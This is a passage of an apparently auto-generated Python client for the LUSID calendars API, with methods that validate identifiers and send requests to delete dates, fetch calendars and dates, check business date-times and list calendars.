                "Got an unexpected keyword argument '%s'"
                " to method delete_date_from_calendar" % key
            )
        params[key] = val

    # Required-parameter and constraint validation.
    if scope is None:
        raise ApiValueError("Missing the required parameter `scope` when calling `delete_date_from_calendar`")  # noqa: E501
    if code is None:
        raise ApiValueError("Missing the required parameter `code` when calling `delete_date_from_calendar`")  # noqa: E501
    if date_id is None:
        raise ApiValueError("Missing the required parameter `date_id` when calling `delete_date_from_calendar`")  # noqa: E501
    if len(scope) > 64:
        raise ApiValueError("Invalid value for parameter `scope` when calling `delete_date_from_calendar`, length must be less than or equal to `64`")  # noqa: E501
    if len(scope) < 1:
        raise ApiValueError("Invalid value for parameter `scope` when calling `delete_date_from_calendar`, length must be greater than or equal to `1`")  # noqa: E501
    if not re.search(r'^[a-zA-Z0-9\-_]+$', scope):
        raise ApiValueError("Invalid value for parameter `scope` when calling `delete_date_from_calendar`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501
    if len(code) > 64:
        raise ApiValueError("Invalid value for parameter `code` when calling `delete_date_from_calendar`, length must be less than or equal to `64`")  # noqa: E501
    if len(code) < 1:
        raise ApiValueError("Invalid value for parameter `code` when calling `delete_date_from_calendar`, length must be greater than or equal to `1`")  # noqa: E501
    if not re.search(r'^[a-zA-Z0-9\-_]+$', code):
        raise ApiValueError("Invalid value for parameter `code` when calling `delete_date_from_calendar`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501
    if len(date_id) > 64:
        raise ApiValueError("Invalid value for parameter `date_id` when calling `delete_date_from_calendar`, length must be less than or equal to `64`")  # noqa: E501
    if len(date_id) < 1:
        raise ApiValueError("Invalid value for parameter `date_id` when calling `delete_date_from_calendar`, length must be greater than or equal to `1`")  # noqa: E501
    if not re.search(r'^[a-zA-Z0-9\-_]+$', date_id):
        raise ApiValueError("Invalid value for parameter `date_id` when calling `delete_date_from_calendar`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501

    # All three identifiers are substituted into the URL path;
    # note the camelCase `dateId` path placeholder.
    path_params = {'scope': scope, 'code': code, 'dateId': date_id}
    header_params = {
        # HTTP `Accept` header
        'Accept': self.api_client.select_header_accept(
            ['text/plain', 'application/json', 'text/json']),  # noqa: E501
        # LUSID SDK identification headers
        'X-LUSID-SDK-Language': 'Python',
        'X-LUSID-SDK-Version': '0.11.3192',
    }

    return self.api_client.call_api(
        '/api/calendars/generic/{scope}/{code}/dates/{dateId}', 'DELETE',
        path_params,
        [],             # no query parameters
        header_params,
        body=None,      # DELETE carries no request body
        post_params=[],
        files={},
        response_type='CalendarDate',  # noqa: E501
        auth_settings=['oauth2'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_calendar(self, scope, code, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Get a calendar in its generic form # noqa: E501

    Retrieve a generic calendar by a specific ID at a point in AsAt time.

    Synchronous by default; pass async_req=True to perform the request
    asynchronously and receive the request thread instead.

    >>> thread = api.get_calendar(scope, code, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str scope: Scope of the calendar identifier (required)
    :param str code: Code of the calendar identifier (required)
    :param datetime as_at: The AsAt datetime at which to retrieve the calendar
    :param _preload_content: if False, the urllib3.HTTPResponse object is
                             returned without reading/decoding the response
                             data. Default is True.
    :param _request_timeout: timeout for this request. A single number is
                             the total request timeout; a (connection, read)
                             tuple sets each timeout individually.
    :return: Calendar
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the *_with_http_info variant, requesting only the
    # deserialised payload (no status code or headers).
    kwargs['_return_http_data_only'] = True
    return self.get_calendar_with_http_info(scope, code, **kwargs)  # noqa: E501
def get_calendar_with_http_info(self, scope, code, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Get a calendar in its generic form # noqa: E501

    Retrieve a generic calendar by a specific ID at a point in AsAt time.

    Synchronous by default; pass async_req=True to perform the request
    asynchronously and receive the request thread instead.

    >>> thread = api.get_calendar_with_http_info(scope, code, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str scope: Scope of the calendar identifier (required)
    :param str code: Code of the calendar identifier (required)
    :param datetime as_at: The AsAt datetime at which to retrieve the calendar
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object is
                             returned without reading/decoding the response
                             data. Default is True.
    :param _request_timeout: timeout for this request. A single number is
                             the total request timeout; a (connection, read)
                             tuple sets each timeout individually.
    :return: tuple(Calendar, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    :raises ApiTypeError: on an unrecognised keyword argument
    :raises ApiValueError: on a missing or invalid scope/code
    """
    params = {'scope': scope, 'code': code}
    accepted = {
        'scope', 'code', 'as_at',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    }
    # Reject any keyword argument this endpoint does not understand.
    for key, val in six.iteritems(kwargs):
        if key not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_calendar" % key
            )
        params[key] = val

    # Required-parameter and constraint validation.
    if scope is None:
        raise ApiValueError("Missing the required parameter `scope` when calling `get_calendar`")  # noqa: E501
    if code is None:
        raise ApiValueError("Missing the required parameter `code` when calling `get_calendar`")  # noqa: E501
    if len(scope) > 64:
        raise ApiValueError("Invalid value for parameter `scope` when calling `get_calendar`, length must be less than or equal to `64`")  # noqa: E501
    if len(scope) < 1:
        raise ApiValueError("Invalid value for parameter `scope` when calling `get_calendar`, length must be greater than or equal to `1`")  # noqa: E501
    if not re.search(r'^[a-zA-Z0-9\-_]+$', scope):
        raise ApiValueError("Invalid value for parameter `scope` when calling `get_calendar`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501
    if len(code) > 64:
        raise ApiValueError("Invalid value for parameter `code` when calling `get_calendar`, length must be less than or equal to `64`")  # noqa: E501
    if len(code) < 1:
        raise ApiValueError("Invalid value for parameter `code` when calling `get_calendar`, length must be greater than or equal to `1`")  # noqa: E501
    if not re.search(r'^[a-zA-Z0-9\-_]+$', code):
        raise ApiValueError("Invalid value for parameter `code` when calling `get_calendar`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501

    # Identifiers are substituted into the URL path; the optional AsAt
    # datetime travels as a query parameter.
    path_params = {'scope': scope, 'code': code}
    query_params = []
    if 'as_at' in params:
        query_params.append(('asAt', params['as_at']))  # noqa: E501
    header_params = {
        # HTTP `Accept` header
        'Accept': self.api_client.select_header_accept(
            ['text/plain', 'application/json', 'text/json']),  # noqa: E501
        # LUSID SDK identification headers
        'X-LUSID-SDK-Language': 'Python',
        'X-LUSID-SDK-Version': '0.11.3192',
    }

    return self.api_client.call_api(
        '/api/calendars/generic/{scope}/{code}', 'GET',
        path_params,
        query_params,
        header_params,
        body=None,      # GET carries no request body
        post_params=[],
        files={},
        response_type='Calendar',  # noqa: E501
        auth_settings=['oauth2'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_dates(self, scope, code, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Get dates for a specific calendar # noqa: E501

    Get dates from a specific calendar within a specific window of
    effective time, at a point in AsAt time. Providing an id filter can
    further refine the results.

    Synchronous by default; pass async_req=True to perform the request
    asynchronously and receive the request thread instead.

    >>> thread = api.get_dates(scope, code, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str scope: Scope of the calendar (required)
    :param str code: Code of the calendar (required)
    :param str from_effective_at: Where the effective window of dates should begin from
    :param str to_effective_at: Where the effective window of dates should end
    :param datetime as_at: AsAt the dates should be retrieved at
    :param list[str] id_filter: An additional filter that will filter dates based on their identifer
    :param _preload_content: if False, the urllib3.HTTPResponse object is
                             returned without reading/decoding the response
                             data. Default is True.
    :param _request_timeout: timeout for this request. A single number is
                             the total request timeout; a (connection, read)
                             tuple sets each timeout individually.
    :return: ResourceListOfCalendarDate
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the *_with_http_info variant, requesting only the
    # deserialised payload (no status code or headers).
    kwargs['_return_http_data_only'] = True
    return self.get_dates_with_http_info(scope, code, **kwargs)  # noqa: E501
def get_dates_with_http_info(self, scope, code, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Get dates for a specific calendar # noqa: E501

    Get dates from a specific calendar within a specific window of
    effective time, at a point in AsAt time. Providing an id filter can
    further refine the results.

    Synchronous by default; pass async_req=True to perform the request
    asynchronously and receive the request thread instead.

    >>> thread = api.get_dates_with_http_info(scope, code, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str scope: Scope of the calendar (required)
    :param str code: Code of the calendar (required)
    :param str from_effective_at: Where the effective window of dates should begin from
    :param str to_effective_at: Where the effective window of dates should end
    :param datetime as_at: AsAt the dates should be retrieved at
    :param list[str] id_filter: An additional filter that will filter dates based on their identifer
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object is
                             returned without reading/decoding the response
                             data. Default is True.
    :param _request_timeout: timeout for this request. A single number is
                             the total request timeout; a (connection, read)
                             tuple sets each timeout individually.
    :return: tuple(ResourceListOfCalendarDate, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    :raises ApiTypeError: on an unrecognised keyword argument
    :raises ApiValueError: on a missing or invalid parameter
    """
    params = {'scope': scope, 'code': code}
    accepted = {
        'scope', 'code', 'from_effective_at', 'to_effective_at',
        'as_at', 'id_filter',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    }
    # Reject any keyword argument this endpoint does not understand.
    for key, val in six.iteritems(kwargs):
        if key not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_dates" % key
            )
        params[key] = val

    # Required-parameter and constraint validation.
    if scope is None:
        raise ApiValueError("Missing the required parameter `scope` when calling `get_dates`")  # noqa: E501
    if code is None:
        raise ApiValueError("Missing the required parameter `code` when calling `get_dates`")  # noqa: E501
    if len(scope) > 64:
        raise ApiValueError("Invalid value for parameter `scope` when calling `get_dates`, length must be less than or equal to `64`")  # noqa: E501
    if len(scope) < 1:
        raise ApiValueError("Invalid value for parameter `scope` when calling `get_dates`, length must be greater than or equal to `1`")  # noqa: E501
    if not re.search(r'^[a-zA-Z0-9\-_]+$', scope):
        raise ApiValueError("Invalid value for parameter `scope` when calling `get_dates`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501
    if len(code) > 64:
        raise ApiValueError("Invalid value for parameter `code` when calling `get_dates`, length must be less than or equal to `64`")  # noqa: E501
    if len(code) < 1:
        raise ApiValueError("Invalid value for parameter `code` when calling `get_dates`, length must be greater than or equal to `1`")  # noqa: E501
    if not re.search(r'^[a-zA-Z0-9\-_]+$', code):
        raise ApiValueError("Invalid value for parameter `code` when calling `get_dates`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501
    if 'from_effective_at' in params:
        window_start = params['from_effective_at']
        if len(window_start) > 256:
            raise ApiValueError("Invalid value for parameter `from_effective_at` when calling `get_dates`, length must be less than or equal to `256`")  # noqa: E501
        if len(window_start) < 0:  # generated guard; len() can never be negative
            raise ApiValueError("Invalid value for parameter `from_effective_at` when calling `get_dates`, length must be greater than or equal to `0`")  # noqa: E501
        if not re.search(r'^[a-zA-Z0-9\-_\+:\.]+$', window_start):
            raise ApiValueError("Invalid value for parameter `from_effective_at` when calling `get_dates`, must conform to the pattern `/^[a-zA-Z0-9\-_\+:\.]+$/`")  # noqa: E501
    if 'to_effective_at' in params:
        window_end = params['to_effective_at']
        if len(window_end) > 256:
            raise ApiValueError("Invalid value for parameter `to_effective_at` when calling `get_dates`, length must be less than or equal to `256`")  # noqa: E501
        if len(window_end) < 0:  # generated guard; len() can never be negative
            raise ApiValueError("Invalid value for parameter `to_effective_at` when calling `get_dates`, length must be greater than or equal to `0`")  # noqa: E501
        if not re.search(r'^[a-zA-Z0-9\-_\+:\.]+$', window_end):
            raise ApiValueError("Invalid value for parameter `to_effective_at` when calling `get_dates`, must conform to the pattern `/^[a-zA-Z0-9\-_\+:\.]+$/`")  # noqa: E501

    # Identifiers are substituted into the URL path; the optional
    # window/AsAt/filter arguments travel as query parameters.
    path_params = {'scope': scope, 'code': code}
    query_params = []
    collection_formats = {}
    if 'from_effective_at' in params:
        query_params.append(('fromEffectiveAt', params['from_effective_at']))  # noqa: E501
    if 'to_effective_at' in params:
        query_params.append(('toEffectiveAt', params['to_effective_at']))  # noqa: E501
    if 'as_at' in params:
        query_params.append(('asAt', params['as_at']))  # noqa: E501
    if 'id_filter' in params:
        # idFilter is a multi-valued query parameter.
        query_params.append(('idFilter', params['id_filter']))  # noqa: E501
        collection_formats['idFilter'] = 'multi'  # noqa: E501
    header_params = {
        # HTTP `Accept` header
        'Accept': self.api_client.select_header_accept(
            ['text/plain', 'application/json', 'text/json']),  # noqa: E501
        # LUSID SDK identification headers
        'X-LUSID-SDK-Language': 'Python',
        'X-LUSID-SDK-Version': '0.11.3192',
    }

    return self.api_client.call_api(
        '/api/calendars/generic/{scope}/{code}/dates', 'GET',
        path_params,
        query_params,
        header_params,
        body=None,      # GET carries no request body
        post_params=[],
        files={},
        response_type='ResourceListOfCalendarDate',  # noqa: E501
        auth_settings=['oauth2'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def is_business_date_time(self, date_time, scope, code, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Check whether a DateTime is a \"Business DateTime\" # noqa: E501

    A Business DateTime is a point in time that: does not fall on a day
    covered by the calendar's WeekendMask; for a \"Holiday Calendar\",
    does not overlap any of the calendar's dates; for a \"TradingHours
    Calendar\", does overlap a date in the calendar. All dates must be
    UTC, and a calendar's upper bound is exclusive, e.g.
    From: 2020-12-25-00-00-00 To: 2020-12-26-00-00-00 gives
    IsBusinessDay(2020-12-26-00-00-00) == false.

    Synchronous by default; pass async_req=True to perform the request
    asynchronously and receive the request thread instead.

    >>> thread = api.is_business_date_time(date_time, scope, code, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param datetime date_time: DateTime to check - This DateTime must be UTC (required)
    :param str scope: Scope of the calendar (required)
    :param str code: Code of the calendar (required)
    :param datetime as_at: AsAt for the request
    :param _preload_content: if False, the urllib3.HTTPResponse object is
                             returned without reading/decoding the response
                             data. Default is True.
    :param _request_timeout: timeout for this request. A single number is
                             the total request timeout; a (connection, read)
                             tuple sets each timeout individually.
    :return: IsBusinessDayResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the *_with_http_info variant, requesting only the
    # deserialised payload (no status code or headers).
    kwargs['_return_http_data_only'] = True
    return self.is_business_date_time_with_http_info(date_time, scope, code, **kwargs)  # noqa: E501
def is_business_date_time_with_http_info(self, date_time, scope, code, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Check whether a DateTime is a \"Business DateTime\"  # noqa: E501

    A Business DateTime is defined as a point in time that: * Does not represent a day that overlaps with the calendars WeekendMask * If the calendar is a \"Holiday Calendar\" Does not overlap with any dates in the calendar * If the calendar is a \"TradingHours Calendar\" Does overlap with a date in the calendar All dates specified must be UTC and the upper bound of a calendar is not inclusive e.g. From: 2020-12-25-00-00-00 To: 2020-12-26-00-00-00 IsBusinessDay(2020-12-26-00-00-00) == false  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.is_business_date_time_with_http_info(date_time, scope, code, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param datetime date_time: DateTime to check - This DateTime must be UTC (required)
    :param str scope: Scope of the calendar (required)
    :param str code: Code of the calendar (required)
    :param datetime as_at: AsAt for the request
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(IsBusinessDayResponse, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # locals() is snapshotted *before* any other local is defined, so it
    # holds exactly: self, date_time, scope, code and the kwargs dict.
    local_var_params = locals()

    # Keyword arguments this endpoint accepts; anything else found in
    # **kwargs is rejected below with an ApiTypeError.
    all_params = ['date_time', 'scope', 'code', 'as_at']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method is_business_date_time" % key
            )
        # Fold recognised kwargs in so every parameter is looked up the
        # same way from local_var_params below.
        local_var_params[key] = val
    del local_var_params['kwargs']

    # verify the required parameter 'date_time' is set
    if ('date_time' not in local_var_params or
            local_var_params['date_time'] is None):
        raise ApiValueError("Missing the required parameter `date_time` when calling `is_business_date_time`")  # noqa: E501
    # verify the required parameter 'scope' is set
    if ('scope' not in local_var_params or
            local_var_params['scope'] is None):
        raise ApiValueError("Missing the required parameter `scope` when calling `is_business_date_time`")  # noqa: E501
    # verify the required parameter 'code' is set
    if ('code' not in local_var_params or
            local_var_params['code'] is None):
        raise ApiValueError("Missing the required parameter `code` when calling `is_business_date_time`")  # noqa: E501

    # Client-side mirror of the server constraints: scope and code must be
    # 1-64 characters drawn from [a-zA-Z0-9-_].
    if ('scope' in local_var_params and
            len(local_var_params['scope']) > 64):
        raise ApiValueError("Invalid value for parameter `scope` when calling `is_business_date_time`, length must be less than or equal to `64`")  # noqa: E501
    if ('scope' in local_var_params and
            len(local_var_params['scope']) < 1):
        raise ApiValueError("Invalid value for parameter `scope` when calling `is_business_date_time`, length must be greater than or equal to `1`")  # noqa: E501
    if 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `scope` when calling `is_business_date_time`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501
    if ('code' in local_var_params and
            len(local_var_params['code']) > 64):
        raise ApiValueError("Invalid value for parameter `code` when calling `is_business_date_time`, length must be less than or equal to `64`")  # noqa: E501
    if ('code' in local_var_params and
            len(local_var_params['code']) < 1):
        raise ApiValueError("Invalid value for parameter `code` when calling `is_business_date_time`, length must be greater than or equal to `1`")  # noqa: E501
    if 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `code` when calling `is_business_date_time`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501

    collection_formats = {}

    # scope and code are URL path segments; the DateTime under test and the
    # optional AsAt travel as query parameters.
    path_params = {}
    if 'scope' in local_var_params:
        path_params['scope'] = local_var_params['scope']  # noqa: E501
    if 'code' in local_var_params:
        path_params['code'] = local_var_params['code']  # noqa: E501

    query_params = []
    if 'date_time' in local_var_params:
        query_params.append(('dateTime', local_var_params['date_time']))  # noqa: E501
    if 'as_at' in local_var_params:
        query_params.append(('asAt', local_var_params['as_at']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET request: no body is sent.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/plain', 'application/json', 'text/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501

    # set the LUSID header (SDK telemetry)
    header_params['X-LUSID-SDK-Language'] = 'Python'
    header_params['X-LUSID-SDK-Version'] = '0.11.3192'

    return self.api_client.call_api(
        '/api/calendars/businessday/{scope}/{code}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='IsBusinessDayResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def list_calendars(self, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] List Calenders  # noqa: E501

    List calendars at a point in AsAt time.  Delegates to
    `list_calendars_with_http_info` and returns only the deserialised
    body.  Synchronous by default; pass ``async_req=True`` to get back a
    thread whose ``get()`` yields the result.

    >>> thread = api.list_calendars(async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param datetime as_at: The AsAt datetime at which to retrieve the calendars
    :param str page: The pagination token to use to continue listing calendars from a previous call to list calendars. This value is returned from the previous call. If a pagination token is provided the sortBy, filter, and asAt fields must not have changed since the original request. Also, if set, a start value cannot be provided.
    :param int limit: When paginating, limit the number of returned results to this many.
    :param str filter: Expression to filter the result set. Read more about filtering results from LUSID here https://support.lusid.com/filtering-results-from-lusid.
    :param _preload_content: if False, the raw urllib3.HTTPResponse is
                             returned without reading/decoding. Default True.
    :param _request_timeout: total timeout, or a (connection, read) tuple
    :return: PagedResourceListOfCalendar
             If the method is called asynchronously,
             returns the request thread.
    """
    # Request only the payload from the *_with_http_info variant.
    kwargs.update(_return_http_data_only=True)
    return self.list_calendars_with_http_info(**kwargs)  # noqa: E501
def list_calendars_with_http_info(self, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] List Calenders  # noqa: E501

    List calendars at a point in AsAt time, returning the deserialised
    body together with the HTTP status code and the response headers.
    Synchronous by default; pass ``async_req=True`` for a thread whose
    ``get()`` yields the tuple.

    >>> thread = api.list_calendars_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param datetime as_at: The AsAt datetime at which to retrieve the calendars
    :param str page: The pagination token to use to continue listing calendars from a previous call to list calendars. This value is returned from the previous call. If a pagination token is provided the sortBy, filter, and asAt fields must not have changed since the original request. Also, if set, a start value cannot be provided.
    :param int limit: When paginating, limit the number of returned results to this many.
    :param str filter: Expression to filter the result set. Read more about filtering results from LUSID here https://support.lusid.com/filtering-results-from-lusid.
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(PagedResourceListOfCalendar, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot taken first, so it contains only 'self' and 'kwargs'.
    params = locals()

    # Everything this endpoint understands; unknown names are rejected.
    recognised = [
        'as_at', 'page', 'limit', 'filter',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]
    for name, value in six.iteritems(params['kwargs']):
        if name not in recognised:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_calendars" % name
            )
        params[name] = value
    del params['kwargs']

    # Mirror the server-side bounds on the page size.
    if 'limit' in params and params['limit'] > 5000:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `limit` when calling `list_calendars`, must be a value less than or equal to `5000`")  # noqa: E501
    if 'limit' in params and params['limit'] < 1:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `limit` when calling `list_calendars`, must be a value greater than or equal to `1`")  # noqa: E501

    # Optional query parameters, emitted in wire order.
    query_params = [
        (wire, params[local])
        for local, wire in (('as_at', 'asAt'), ('page', 'page'),
                            ('limit', 'limit'), ('filter', 'filter'))
        if local in params
    ]

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['text/plain', 'application/json', 'text/json']),  # noqa: E501
        # LUSID SDK telemetry headers.
        'X-LUSID-SDK-Language': 'Python',
        'X-LUSID-SDK-Version': '0.11.3192',
    }

    return self.api_client.call_api(
        '/api/calendars/generic', 'GET',
        {},                 # no path parameters on this route
        query_params,
        header_params,
        body=None,          # GET request: no body
        post_params=[],
        files={},
        response_type='PagedResourceListOfCalendar',  # noqa: E501
        auth_settings=['oauth2'],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def list_calendars_in_scope(self, scope, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] List all calenders in a specified scope  # noqa: E501

    List calendars at a point in AsAt time.  Delegates to
    `list_calendars_in_scope_with_http_info` and returns only the
    deserialised body.  Synchronous by default; pass ``async_req=True``
    to get back a thread whose ``get()`` yields the result.

    >>> thread = api.list_calendars_in_scope(scope, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str scope: Scope of the calendars (required)
    :param datetime as_at: The AsAt datetime at which to retrieve the calendars
    :param str page: The pagination token to use to continue listing calendars from a previous call to list calendars. This value is returned from the previous call. If a pagination token is provided the sortBy, filter, and asAt fields must not have changed since the original request. Also, if set, a start value cannot be provided.
    :param int start: When paginating, skip this number of results.
    :param int limit: When paginating, limit the number of returned results to this many.
    :param str filter: Expression to filter the result set. Read more about filtering results from LUSID here https://support.lusid.com/filtering-results-from-lusid.
    :param _preload_content: if False, the raw urllib3.HTTPResponse is
                             returned without reading/decoding. Default True.
    :param _request_timeout: total timeout, or a (connection, read) tuple
    :return: PagedResourceListOfCalendar
             If the method is called asynchronously,
             returns the request thread.
    """
    # Request only the payload from the *_with_http_info variant.
    kwargs.update(_return_http_data_only=True)
    return self.list_calendars_in_scope_with_http_info(scope, **kwargs)  # noqa: E501
def list_calendars_in_scope_with_http_info(self, scope, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] List all calenders in a specified scope  # noqa: E501

    List calendars at a point in AsAt time.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.list_calendars_in_scope_with_http_info(scope, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str scope: Scope of the calendars (required)
    :param datetime as_at: The AsAt datetime at which to retrieve the calendars
    :param str page: The pagination token to use to continue listing calendars from a previous call to list calendars. This value is returned from the previous call. If a pagination token is provided the sortBy, filter, and asAt fields must not have changed since the original request. Also, if set, a start value cannot be provided.
    :param int start: When paginating, skip this number of results.
    :param int limit: When paginating, limit the number of returned results to this many.
    :param str filter: Expression to filter the result set. Read more about filtering results from LUSID here https://support.lusid.com/filtering-results-from-lusid.
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(PagedResourceListOfCalendar, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # locals() is snapshotted before any other local is defined, so it
    # holds exactly: self, scope and the kwargs dict.
    local_var_params = locals()

    # Keyword arguments this endpoint accepts; anything else found in
    # **kwargs is rejected below with an ApiTypeError.
    all_params = ['scope', 'as_at', 'page', 'start', 'limit', 'filter']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_calendars_in_scope" % key
            )
        # Fold recognised kwargs in for uniform lookup below.
        local_var_params[key] = val
    del local_var_params['kwargs']

    # verify the required parameter 'scope' is set
    if ('scope' not in local_var_params or
            local_var_params['scope'] is None):
        raise ApiValueError("Missing the required parameter `scope` when calling `list_calendars_in_scope`")  # noqa: E501

    # Client-side mirror of the server constraints.
    # scope: 1-64 characters from [a-zA-Z0-9-_].
    if ('scope' in local_var_params and
            len(local_var_params['scope']) > 64):
        raise ApiValueError("Invalid value for parameter `scope` when calling `list_calendars_in_scope`, length must be less than or equal to `64`")  # noqa: E501
    if ('scope' in local_var_params and
            len(local_var_params['scope']) < 1):
        raise ApiValueError("Invalid value for parameter `scope` when calling `list_calendars_in_scope`, length must be greater than or equal to `1`")  # noqa: E501
    if 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `scope` when calling `list_calendars_in_scope`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501
    # page: 1-500 characters; the pattern matches base64-style tokens
    # ([A-Za-z0-9+/] with up to three '=' padding characters).
    if ('page' in local_var_params and
            len(local_var_params['page']) > 500):
        raise ApiValueError("Invalid value for parameter `page` when calling `list_calendars_in_scope`, length must be less than or equal to `500`")  # noqa: E501
    if ('page' in local_var_params and
            len(local_var_params['page']) < 1):
        raise ApiValueError("Invalid value for parameter `page` when calling `list_calendars_in_scope`, length must be greater than or equal to `1`")  # noqa: E501
    if 'page' in local_var_params and not re.search(r'^[a-zA-Z0-9\+\/]*={0,3}$', local_var_params['page']):  # noqa: E501
